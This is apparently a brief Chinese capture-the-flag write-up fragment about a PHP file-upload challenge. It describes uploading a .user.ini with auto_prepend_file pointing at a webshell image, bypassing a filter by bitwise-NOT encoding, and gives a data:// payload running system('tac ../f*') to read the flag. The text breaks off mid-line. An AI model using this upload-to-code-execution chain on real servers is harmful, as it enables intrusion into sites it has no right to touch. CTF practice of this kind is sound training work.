目录 思路 总结 思路 直接在burp里面改target和host的值,或者在本地发包 成功上传.user.ini auto_prepend_file=shell.png 继续用取反来解 取反脚本 $a = "data://text/plain,<?php system('tac ../f*');?>";<